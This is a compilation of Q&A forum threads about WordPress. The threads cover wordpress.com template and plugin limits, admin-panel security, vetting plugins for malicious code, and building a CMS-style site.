I am using a .wordpress.com blog that would like to get some custom page templates, I understand how how to write page templates, but, I don't understand how to get the template onto whatever.wordpress.com without FTP access!
EDIT: I don't want themes, I need to basically make a price form, where users select options, and based on options the price of a product increases, and this price is emailed to the user. I sort of guessed I could use page templates for this, but, I'm open to suggestions.
You are pretty much out of luck for the wordpress.com free feature. For full custom template options, you will need to host your own word press site. Or alternatively, choose a good theme and customize the css / etc, as part of its 'premium' feature:
http://en.wordpress.com/products/
EDIT: side notes
Hosting plans are cheap anyway for wordpress blogs these days, LOL most major host allows it to be pre-installed as you purchase your web-space. At less then US$10 per month, it ain't that bad. Probably cheaper then 'premium' with alot more freedom. (=X unless you already got a really popular bog)
Additionally, wordpress admin interface itself, comes with a built in theme / file editor (if you host it on your own). That allows you to edit the theme / PHP / css files. Though it may lack syntax highlighting, that can be easily remedied with plug-ins.
Install themeforest theme in wordpress.com (similar question)
You can't install custom templates on a wordpress.com blog, only choose whatever is there.
You need your own hosting to be able to install custom themes.
Related
Let's says I want give someone access to wordpress admin panel so he can edit posts, settings etc.
My question is: Is admin panel in plain wordpress installation safe so new user won't be able to run any PHP server-side code? He won't be able to install plugins obviously (no ftp access, chmod +r-w and on all wp folders).
he can put as many javascripts to posts as he wants, I know he will be able to hijack my cookies etc, I don't mind. I am asking only about server-side code.
If your WordPress installation is up to date, you are only using plugins from trusted developers, and you have your user roles properly configured for your specific security needs, then yes you can expect WordPress admin to be safe from server side scripting.
Out of the box WordPress ships with user roles that can be modified to your liking. For instance, I'm a super admin of a multisite and can access all sites and network admin, but I don't want my admins to have either. I can set the access level for network admin area, and what sites each admin can access.
This can be further customized to disable things like the theme / plugin editors so you would only be able to manipulate core files from FTP etc. Also, disable the ability to install plugins.
I use a plugin called User Role Editor and Adminimize to control various parts of any role i.e. editor, admin etc. I've also written my own plugin to further customize the user experience.
By default I believe you will find any js or other scripting gets stripped out of the wp editor in pages / posts. You can circumvent this by using a text widget or a plugin I use called HTML Javascript Adder.
Adminimize
User Role Editor
HTML Javascript Adder
To be honest this is not something that can be answered here with a cut and dry answer.
As far as I can remember there is not a location where an admin can edit a file, upload a file or enter PHP to be executed.
This does not mean that there are no ways to execute PHP however. As far as we know at present there are no known security vulnerabilities with the current version of Wordpress however only time will tell if this will remain the same. It might be possible for example to exploit a form and enter PHP that can be executed unintentionally. It may also be possible to edit the URI with PHP code that is not sanitized correctly on the server.
Take a look at this site which will show the numerous vulnerabilities that Wordpress has had in the past.
https://wpvulndb.com/wordpresses
I am sure the Wordpress developers did not knowingly release the software with these bugs but yet it happened.
AFAIK by default you can only do that via the template editor.
Now... if you don't allow any file to be modified, in theory there is no other OOTB functionality that allows arbitrary code execution, so it should be safe, BUT...! It's Wordpress, come on... it has always had security issues, and it will continue to do so because it is full of legacy code and it is poorly designed.
Plus, to be honest, you shouldn't make such safety assumptions even for well engineered software.
I want to create a blog-like website. At the begining I'll need a simple one person blog software, but in the future I'd like to have full access to the code and database (control the way posts are organized, offer special forms for creating new posts, allow users to register, implement a rating system, etc.)
What's the best solution for this? Is there a specific tool that will generate a database and php files, to which I'll have access, or should I code everything from zip?
I know Wordpress and Joomla are good blogging tools, but couldn't figure out whether I'll be able to freely redesign a blog that was created using those tools.
Wordpress is an open-source, flexible website infrastructure that is pluggable; and also quite simple to setup without any code modifications. It will generate its own database files and is capable of upgrading itself with minimal administrative overhead.
If you choose at a later date to expand the blog, you can manipulate and customize the theme (100% of what the end-users see), as you see fit.
Wordpress also has a strong plugin repository that may provide extended functionality without any need to code. For example, a post rating plugin already exists that shouldn't require coding to implement;
http://wordpress.org/extend/plugins/rate-this-page-plugin/
Just install wordpress, you'll have full access to the code and database, and it supports writing plugins to extend functionality. You can change page layout with their template engine.
Writing a blog from scratch is not a simple job
Just use Wordpress for now.
There are plenty of plugins to customize Wordpress
You can later develop your own plugins or write a new weblog system and migrate to it.
I'll promise when getting familiar with Wordpress. you won't leave it anymore!
There are thousands of plugins and themes available at wordpress.org and many other third parties. There is every possibility of bad plugins and themes being uploaded, which once uploaded could send info about the site to its owner. It could also send the information in the wp-config.php (A high security risk).
Please tell me how to protect wordpress sites from this other than by reading the code line by line. Also tell me if plugins and themes at wordpress.org are analyzed by the wordpress developers for threats like this before making it available to public.
Thank you.
Peace to All....
As with any code you run on your own server(s), WordPress plugins are caveat emptor.
That said, popular plugins have probably had a fair number of eyes on their code, making it unlikely that they're doing something shady. You probably don't need to go over them with a fine-tooth comb before installing them.
Lesser-known/used plugins, however, should probably be looked over before you install them on a site/server that you care about.
WordPress.org does not review every bit of code that goes into plugins - the only time they even do any review at all is when the plugin is initially submitted to the plugin directory, and that's cursory at best (mostly just to avoid spam). A plugin's code can change drastically after it's initially submitted.
Typically I will look at the feedback the plugin received on wordpress.org What kind of rating does it have? What comments/questions are asked in the 'what others are saying' section.
After making the decision to install the plugin, BACKUP YOUR DATA PRIOR TO THE ACTUAL INSTALLATION.
This is just good practice in any case, whether it's a wordpress core installation, plugin installation, or theme. If something breaks, you will have something to go back to.
Also making sure to keep frequent backups is a must. If you do get infected, you will want a snapshot.
There is a good article about the safety and security of themes that best plugins for wordpress put together. Also you can go some off of the rating given by the community straight from the wordpress plugin site. If you keep with plugins that have a 4-5 star rating and lots of downloads/ratings, you will most likely be ok. However, because this is an open source project, there is really not a 100% way to keep hackers and "bad people" from putting code in a what appears to be good theme/plugin that you are describing.
In this case if you have concern of a theme or plugin, I would always look over the code very carefully and make sure that it all looks good to you. Of course this is always time consuming and if you are not comfortable with code, this may not be an option. If you have questions about a certain set of plugins/themes, im sure if you post them here, there are many people that have used the plugin and maybe the theme before that can help you out.
From "Best Plugins for Wordpress"
1 TAC (Theme Authenticity Checker) Plugin
A very simple and straight forward plugin that will scan all files within your theme to >>check for any malicious or unwanted code.
2 Theme-Check Plugin
You may notice that a lot of free themes aren’t available directly from WordPress.org, >>the main reason for this is that most free themes don’t pass the tests that WordPress.org subjects them too. This nifty plugin will provide you with all the testing tools you will need to conduct the same tests that WordPress.org does. It’s also useful for theme developers who want to make sure their theme supports the latest standards.
3 Exploit Scanner Plugin
This plugin isn’t just for themes, it’s for your entire site, so it’s worth keeping once you’ve checked out the theme you’ve decided to use on your site. It scans all files, posts and comments on your site for any possible exploits or anything that looks suspicious, please note however that this plugin will not remove any files.
I have a plain-vanilla install of Wordpress on localhost, virtual host in Apache set to:
127.0.0.1 myradiostationhere.com
127.0.0.1 www.myradioanytown.co.uk
and the virtual host works.
However, I don't want to use it as a blog, but as a CMS like here:
http://www.brmb.co.uk/
and
http://www.brmb.co.uk/schedule/
(basically, any pages on that site are database-driven Wordpress pages, not blogs).
I'm not asking how to create pages etc. - I understand that - but rather if anyone knows of the best way to do this.
I'm trying to emulate their look, but with similar CSS stylesheets, as per:
Fair dealing in a work for the purposes of private study or research (s. 29)
under Copyright, Design and Patents Act 1988 (that's the legal bit out the way).
Would I need to edit the PHP files in order to get this to work in the way I intend to?
Anyone here had experience of custom Wordpress CMS design/installs, and how would you recommend I go about this?
(note: This isn't for a live radio station site, it's a development/testing site on localhost!)
You basically want to create WordPress theme.
You will need a bit of PHP editing, but mostly of the copy-and-paste variety (to get you started).
Another option is to download a similar free theme or even buy one.
Is it possible to use plugins on my blog for WordPress.com? There are some very nice tutorials on how to do this if I have WordPress installed on my own server, but I am using wordpress.com.
Does anyone know if they allow this? It seems like the expected "Plugin" category on my dashboard is missing.
Many thanks,
brett
It already has some plugins built in such as Akismet, but you can not add your own on Wordpress.com (you can't even add other themes and can only use the ones they provide).
Here is a list of the free features. With premium paid for features, you also have the ability to use your own domain name and can customize your CSS (as well as some other stuff).
Wordpress.com doesn't let you install your own plugins.